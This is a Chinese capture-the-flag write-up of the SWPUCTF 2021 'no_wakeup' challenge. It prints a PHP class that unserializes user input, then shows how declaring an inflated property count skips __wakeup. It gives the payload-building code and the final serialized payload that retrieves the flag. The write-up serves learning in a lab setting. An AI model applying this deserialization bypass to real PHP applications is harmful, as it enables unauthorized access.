[SWPUCTF 2021 新生赛]no_wakeup

3 篇文章 0 订阅
1 篇文章 0 订阅

[SWPUCTF 2021 新生赛]no_wakeup
继续在NSSCTF刷题

进入网站后发现如下代码:
image.png

<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
  public $admin;
  public $passwd;

  public function __construct(){
    $this->admin ="user";
    $this->passwd = "123456";
  }

  public function __wakeup(){
    $this->passwd = sha1($this->passwd);
  }

  public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "wllm"){
      include("flag.php");
      echo $flag;
    }else{
      echo $this->passwd;
      echo "No wake up";
    }
  }
}

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

分析

分析代码之后发现当admin = "admin"和passwd ="wllm"时就会输出flag
但有一个魔法方法:_wakeup():

当你使用serialize()函数将一个对象转换为字符串以便存储或传输时,该对象的所有公共属性(public)、保护属性(protected)和私有属性(private)都会被保存。但是,对象的某些状态或资源(如打开的数据库连接、文件句柄等)不会被保存。
然后,当你使用unserialize()函数将这个字符串转换回对象时,PHP会重新创建该对象并恢复其所有保存的属性值。但是,在恢复对象之前,PHP会检查该对象是否有一个__wakeup()方法。如果有,那么在恢复对象的属性之前,PHP会调用__wakeup()方法。

经过学习之后了解到:
_wakeup()绕过方法:

__wakeup()函数漏洞:
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

构造payload:

<?php
class HaHaHa{
    public $admin = "admin";
    public $passwd = "wllm";
}
$bx = new HaHaHa();
echo serialize($bx);
?>

image.png
当输入这个payload时,发现_wakeup方法执行了
所以此时修改payload来绕过方法
image.png

修改后:
p=O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}

image.png
得到NSSCTF

  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值